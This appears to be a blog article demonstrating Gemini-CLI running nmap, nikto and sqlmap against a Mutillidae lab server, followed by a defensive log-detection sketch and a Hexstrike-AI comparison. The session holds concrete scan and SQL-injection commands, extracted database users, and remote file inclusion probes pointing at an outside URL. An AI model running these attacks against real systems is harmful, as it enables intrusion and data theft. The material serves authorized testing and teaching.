Loaded cached credentials.
███ █████████ ██████████ ██████ ██████ █████ ██████ █████ █████
░░░███ ███░░░░░███░░███░░░░░█░░██████ ██████ ░░███ ░░██████ ░░███ ░░███
░░░███ ███ ░░░ ░███ █ ░ ░███░█████░███ ░███ ░███░███ ░███ ░███
░░░███ ░███ ░██████ ░███░░███ ░███ ░███ ░███░░███░███ ░███
███░ ░███ █████ ░███░░█ ░███ ░░░ ░███ ░███ ░███ ░░██████ ░███
███░ ░░███ ░░███ ░███ ░ █ ░███ ░███ ░███ ░███ ░░█████ ░███
███░ ░░█████████ ██████████ █████ █████ █████ █████ ░░█████ █████
░░░ ░░░░░░░░░ ░░░░░░░░░░ ░░░░░ ░░░░░ ░░░░░ ░░░░░ ░░░░░ ░░░░░
Tips for getting started:
1. Ask questions, edit files, or run commands.
2. Be specific for the best results.
3. Create GEMINI.md files to customize your interactions with Gemini.
4. /help for more information.
╭───────────────────────────────────────────────────────────────────────────────╮
│ > Type your message or @path/to/file │
╰───────────────────────────────────────────────────────────────────────────────╯
/usr/lib/gemini-cli no sandbox (see /docs) gemini-2.5-pro (100% context left)
- The AI client is ready to receive prompts to interact with gemini-cli to perform security tests
More details about Gemini-CLI: https://www.kali.org/tools/gemini-cli/
AI Client Used: Gemini-CLI
Vulnerable Test Server: Mutillidae
Prompts Used:
- run nmap to discover live hosts in 192.168.0.0 network that are listening on port 80 or 443
- run nikto for 192.168.0.152
- run sqlmap for the login page to detect sql injection and try to discover databases and users on the sql server.
> run nmap to discover live hosts in 192.168.0.0 network that are listening on port 80 or 443

✦ I will scan the 192.168.0.0/24 network for hosts with open TCP ports 80 or 443.

✔ Shell nmap -T4 --open -p 80,443 192.168.0.0/24 (Scan the 192.168.0.0/24)netw…

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-21 13:31 EDT
Nmap scan report for 192.168.0.1
Host is up (0.0087s latency).

PORT STATE SERVICE
80/tcp open http
443/tcp open https
MAC Address: A4:56:CC:1A:30:9A (Technicolor CH USA)

Nmap scan report for 192.168.0.152
Host is up (0.00060s latency).

PORT STATE SERVICE
80/tcp open http
443/tcp open https
MAC Address: D4:6A:6A:A1:4C:21 (Hon Hai Precision Ind.)

Nmap done: 256 IP addresses (10 hosts up) scanned in 7.43 seconds

✦ The scan found two hosts with ports 80 and 443 open: 192.168.0.1 and 192.168.0.152.

> run nikto for 192.168.0.152

✦ I will run a Nikto scan on 192.168.0.152 to check for web server vulnerabilities.

✔ Shell nikto -h 192.168.0.152 (Run a Nikto scan on 192.168.0.152 to check for…

... first 306 lines hidden ...
https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?mode=http://blog.cirt.net/rfiinc.txt?&cmd=: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?modpath=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list.
See: │ │ https://gist.github.com/mubix/5d269c686584875015a2 │ │ + /index.php?themesdir=http://blog.cirt.net/rfiinc.txt: Remote │ │ File Inclusion (RFI) from RSnake's RFI list. See: │ │ https://gist.github.com/mubix/5d269c686584875015a2 │ │ + /index.php?this_path=http://blog.cirt.net/rfiinc.txt?: Remote │ │ File Inclusion (RFI) from RSnake's RFI list. See: │ │ https://gist.github.com/mubix/5d269c686584875015a2 │ │ + /index.php?txt=http://blog.cirt.net/rfiinc.txt: Remote File │ │ Inclusion (RFI) from RSnake's RFI list. See: │ │ https://gist.github.com/mubix/5d269c686584875015a2 │ │ + /index.php?up=http://blog.cirt.net/rfiinc.txt: Remote File │ │ Inclusion (RFI) from RSnake's RFI list. See: │ │ https://gist.github.com/mubix/5d269c686584875015a2 │ │ + /index.php?url=http://blog.cirt.net/rfiinc.txt: Remote File │ │ Inclusion (RFI) from RSnake's RFI list. See: │ │ https://gist.github.com/mubix/5d269c686584875015a2 │ │ + /index.php?w=http://blog.cirt.net/rfiinc.txt: Remote File │ │ Inclusion (RFI) from RSnake's RFI list. See: │ │ https://gist.github.com/mubix/5d269c686584875015a2 │ │ + /index.php?way=http://blog.cirt.net/rfiinc.txt??????????????: │ │ Remote File Inclusion (RFI) from RSnake's RFI list. See: │ │ https://gist.github.com/mubix/5d269c686584875015a2 │ │ + /login.php: Admin login page/section found. │ │ + /webservices/: Directory indexing found. │ │ + /webservices/: Webservices found. │ │ + 8110 requests: 0 error(s) and 145 item(s) reported on remote │ │ host │ │ + End Time: 2025-10-21 13:35:37 (GMT-4) (197 seconds) │ │ ----------------------------------------------------------------- │ │ + 1 host(s) tested │ │ │ │ ***************************************************************** │ │ Portions of the server's headers (Apache/2.4.65) are not in │ │ the Nikto 2.5.0 database or are newer than the known │ │ string. Would you like │ │ to submit this information (*no server specific data*) to │ │ CIRT.net │ │ for a Nikto update (or you may email to │ (y/n)? 
│ ╰──────────────────────────────────────────────────────────────────────────────────╯ ✦ The Nikto scan of 192.168.0.152 revealed several potential vulnerabilities. Key findings include: * Missing Security Headers: The X-Frame-Options and X-Content-Type-Options headers are not set, which could lead to clickjacking and MIME-type sniffing attacks. * Insecure Cookies: The PHPSESSID and showhints cookies are created without the httponly flag, making them accessible to client-side scripts and increasing the risk of session hijacking. * Information Disclosure: The server returns a x-powered-by header revealing it's running PHP/8.4.13. The phpinfo.php file is also accessible, which discloses a significant amount of system information. * Directory Indexing: Several directories, including /data/, /includes/, /passwords/, /images/, /styles/, and /webservices/, have directory indexing enabled, which can expose sensitive files. * File Traversal/Inclusion: The scan identified a potential file traversal vulnerability in a PHP-Nuke Rocket add-in and numerous potential Remote File Inclusion (RFI) vulnerabilities. * robots.txt: The robots.txt file contains 7 entries that should be manually reviewed. The scan also found an admin login page at /login.php. It seems like this web server has a lot of security issues. ╭──────────────────────────────────────────────────────────────────────────────╮ │ > run sqlmap for the login page to detect sql injection and try to discover │ │ databases and users on the sql server. │ ╰──────────────────────────────────────────────────────────────────────────────╯ ✦ I will now run sqlmap on the login page to test for SQL injection vulnerabilities. As you requested, I will instruct sqlmap to attempt to enumerate all databases and users. ╭────────────────────────────────────────────────────────────────────────────────────────────────────────╮ │ ✓ Shell sqlmap -u 'http://192.168.0.152/index.php?page=login.php' --data='username=test&password=test…│ │ │ │ ... 
first 133 lines hidden ... │ │ web application technology: PHP 8.4.13, Apache 2.4.65, PHP │ │ back-end DBMS: MySQL >= 5.0 (MariaDB fork) │ │ [01:45:39] [INFO] fetching database users │ │ [01:45:39] [INFO] retrieved: ''healthcheck'@'localhost'' │ │ [01:45:40] [INFO] retrieved: ''healthcheck'@'::1'' │ │ [01:45:40] [INFO] retrieved: ''healthcheck'@'127.0.0.1'' │ │ [01:45:40] [INFO] retrieved: ''mariadb.sys'@'localhost'' │ │ [01:45:40] [INFO] retrieved: ''root'@'localhost'' │ │ [01:45:40] [INFO] retrieved: ''root'@'localhost'' │ │ [01:45:40] [INFO] retrieved: ''root'@'localhost'' │ │ [01:45:40] [INFO] retrieved: ''root'@'localhost'' │ │ [01:45:40] [INFO] retrieved: ''root'@'localhost'' │ │ [01:45:42] [INFO] retrieved: ''root'@'%'' │ │ [01:45:42] [INFO] retrieved: ''root'@'%'' │ │ [01:45:43] [INFO] retrieved: ''root'@'%'' │ │ [01:45:43] [INFO] retrieved: ''root'@'%'' │ │ [01:45:43] [INFO] retrieved: ''root'@'%'' │ │ database management system users [6]: │ │ [*] 'healthcheck'@'127.0.0.1' │ │ [*] 'healthcheck'@'::1' │ │ [*] 'healthcheck'@'localhost' │ │ [*] 'mariadb.sys'@'localhost' │ │ [*] 'root'@'%' │ │ [*] 'root'@'localhost' │ │ │ │ [01:45:45] [INFO] fetching database names │ │ [01:45:45] [INFO] retrieved: 'information_schema' │ │ [01:45:45] [INFO] retrieved: 'sys' │ │ [01:45:45] [INFO] retrieved: 'mysql' │ │ [01:45:45] [INFO] retrieved: 'performance_schema' │ │ [01:45:45] [INFO] retrieved: 'mutillidae' │ │ available databases [5]: │ │ [*] information_schema │ │ [*] mutillidae │ │ [*] mysql │ │ [*] performance_schema │ │ [*] sys │ │ │ │ [01:45:46] [INFO] you can find results of scanning in multiple targets mode inside the CSV │ │ file '/root/.local/share/sqlmap/output/results-10212025_0144am.csv' │ │ │ │ [*] ending @ 01:45:46 /2025-10-21/ │ ╰────────────────────────────────────────────────────────────────────────────────────────────────────────╯ ✦ The sqlmap scan was successful and confirmed that the username parameter on the login page is vulnerable to SQL injection. 
Here are the databases and users that were extracted: Databases: * information_schema * mutillidae * mysql * performance_schema * sys Users: * 'healthcheck'@'127.0.0.1' * 'healthcheck'@'::1' * 'healthcheck'@'localhost' * 'mariadb.sys'@'localhost' * 'root'@'%' * 'root'@'localhost' The mutillidae database seems to be the most relevant to the application. Would you like me to try to extract the tables and their contents from this database? |
Note: The test was performed in a private, isolated lab environment as a proof-of-concept to evaluate Gemini-CLI effectiveness in penetration-testing workflows. All tests were authorized, reproducible, contained, and confined to isolated systems; no production or third-party systems were involved.
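Seen from the defending side, the scans in the session above are loud: one source sends many requests to the same script, each with a different parameter name carrying an absolute URL, often under a default scanner user agent. The detection sketch below is an added example, not part of the original article or of either tool; the log lines are constructed, and the function names and the threshold of three distinct parameters are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" access-log line: source IP, request target, user agent.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
# Default user-agent markers; trivially changed, so only a weak signal.
SCANNER_AGENTS = re.compile(r"nikto|sqlmap", re.I)
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)

# Constructed sample data (documentation address range, placeholder host).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Oct/2025:13:33:01 -0400] "GET /index.php?page=http://example.invalid/probe.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.00 (Nikto/2.5.0)"
192.0.2.10 - - [21/Oct/2025:13:33:01 -0400] "GET /index.php?pagina=http://example.invalid/probe.txt? HTTP/1.1" 200 5120 "-" "Mozilla/5.00 (Nikto/2.5.0)"
192.0.2.10 - - [21/Oct/2025:13:33:02 -0400] "GET /index.php?path_to_folder=http://example.invalid/probe.txt?cmd=id HTTP/1.1" 200 5120 "-" "Mozilla/5.00 (Nikto/2.5.0)"
192.0.2.30 - - [21/Oct/2025:14:02:10 -0400] "GET /index.php?theme=http://example.invalid/probe.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.30 - - [21/Oct/2025:14:02:11 -0400] "GET /index.php?template=http://example.invalid/probe.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.30 - - [21/Oct/2025:14:02:12 -0400] "GET /index.php?url=http://example.invalid/probe.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.20 - - [21/Oct/2025:14:05:40 -0400] "GET /index.php?page=home.php&redirect=https://example.invalid/docs HTTP/1.1" 200 7300 "-" "Mozilla/5.0"
192.0.2.40 - - [21/Oct/2025:14:09:03 -0400] "POST /index.php?page=login.php HTTP/1.1" 200 4100 "-" "sqlmap/1.x (https://sqlmap.org)"
"""


def rfi_params(target):
    """Names of query parameters whose value is an absolute remote URL."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [name for name, value in pairs if REMOTE_URL.match(value)]


def analyze(log_text, min_params=3):
    """Return {source_ip: evidence} for RFI parameter sweeps and scanner agents.

    min_params is an assumed threshold: a single URL-valued parameter occurs in
    normal traffic (redirects); many distinct ones from one source do not.
    """
    params, agents = defaultdict(set), defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # ignore lines that are not in combined format
        params[m["ip"]].update(rfi_params(m["target"]))
        hit = SCANNER_AGENTS.search(m["agent"])
        if hit:
            agents[m["ip"]].add(hit.group(0).lower())
    findings = {}
    for ip in params:
        sweep = len(params[ip]) >= min_params
        if sweep or agents[ip]:
            findings[ip] = {"rfi_params": sorted(params[ip]), "sweep": sweep,
                            "agents": sorted(agents[ip])}
    return findings


if __name__ == "__main__":
    for ip, evidence in sorted(analyze(SAMPLE_LOG).items()):
        print(ip, evidence)
```

The sweep from 192.0.2.30 is flagged even though it presents a browser user agent, while the single redirect parameter from 192.0.2.20 stays below the threshold.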
Comparison: Hexstrike-AI vs. Gemini-CLI
| Feature | Hexstrike-AI | Gemini-CLI Native |
|---|---|---|
| AI Model Support | Supports any LLM (e.g., Claude, GPT, Copilot, Deepseek) via MCP integration; highly flexible for custom setups. | Limited to Google's Gemini models (e.g., Gemini 2.5 Pro); no support for external LLMs. |
| Tool Integration | Autonomous execution of 150+ Kali tools (e.g., Nmap, sqlmap, Metasploit, hashcat) across categories like reconnaissance, web exploits, and reverse engineering. | Integrates with Kali's core tools (e.g., Nmap, sqlmap, wfuzz) for chained automation; focuses on OWASP Top 10 and common workflows. |
| Automation Level | High autonomy with multi-agent architecture; AI agents make decisions, discover attack chains, and run full pentests independently. | Semi-autonomous; natural language prompts trigger steps, but requires human review/confirmation (interactive mode) or "YOLO" mode for full auto. |
| Use Cases | Advanced pentesting, bug bounty automation, zero-day exploitation, security research; excels in complex, multi-stage scenarios. | Reconnaissance, enumeration, vulnerability scanning, remediation suggestions; best for quick, guided assessments. |
| Installation | Git clone from GitHub, Python venv setup, pip dependencies; requires manual tool installs (script available); ~50GB+ storage for full setup. | Native via sudo apt install gemini-cli; lightweight (12MB installed size); no extra dependencies beyond Kali 2025.3. |
| System Requirements | Kali 2024.1+, Python 3.9+, 8GB+ RAM, 50GB+ storage, GPU optional for acceleration. | Kali 2025.3+, minimal resources; runs efficiently on standard hardware. |
| Human Oversight | Optional; designed for full autonomy but supports intervention via API/logs. | Emphasizes control; prompts for confirmation on actions to prevent misuse. |
| Ethical/Safety Features | Logging and caching for audit; creator emphasizes defender use, but adaptable for red teaming. | Built-in consent prompts, operation logging, offline mode; safeguards against over-reliance or abuse. |
| Community & Updates | Active GitHub repo (0x4m4/hexstrike-ai); v6.0 includes vulnerability intelligence; community-driven tool additions. | Official Kali package; tied to Google's Gemini updates; integrated into Kali's rolling release cycle. |
Looking at the Future to Advance Offensive Security Using AI
Hexstrike-AI represents a highly automated, tool-chain-oriented, end-to-end AI framework capable of performing reconnaissance, scanning, exploitation, and persistence with minimal manual intervention. This level of automation introduces significant efficiency gains but also comes with added complexity and potential risk.
Gemini-CLI, on the other hand, serves as an LLM-powered assistant integrated into the penetration testing workflow. It provides a conversational interface for crafting reconnaissance queries, generating command snippets, and assisting in payload development—while maintaining the operator’s control over execution.
Together, these tools demonstrate how artificial intelligence is transforming offensive security from traditional “manual toolsets and scripts” into “AI-assisted reasoning and automation.” However, they also emphasize an essential principle: technology cannot replace human judgment, authorization, or ethical responsibility. When applied responsibly, AI tools act as powerful force multipliers; when misused, they can amplify risk and unintended consequences.
Conclusion
What this comparison shows is that AI-powered offensive tools are no longer just hype — they’re becoming practical. Hexstrike-AI shines when you need a more autonomous exploit-and-escalate chain. Gemini-CLI stands out when you want flexibility, data-driven reconnaissance and payload refinement.
For anyone in offensive security on Kali Linux: these tools represent the next wave — faster, smarter, more adaptive. That said, they don’t replace human expertise, judgment or ethics. Used well, they’re force multipliers. Used poorly, they can raise serious risk.
In short: Hexstrike-AI and Gemini-CLI signal that offensive security is evolving — and practitioners who stay ahead of the curve will be better equipped.
Disclaimer: This documentation is intended for educational purposes only. The content provided herein is meant to inform and educate individuals about security practices, techniques, and tools. Security-Science does not support, endorse, or encourage any illegal or unethical activities, including but not limited to unauthorized access to computer systems, networks, or data. Users are advised to apply the knowledge gained responsibly and ensure compliance with all applicable laws and regulations. Security-Science shall not be held liable for any misuse of the information provided.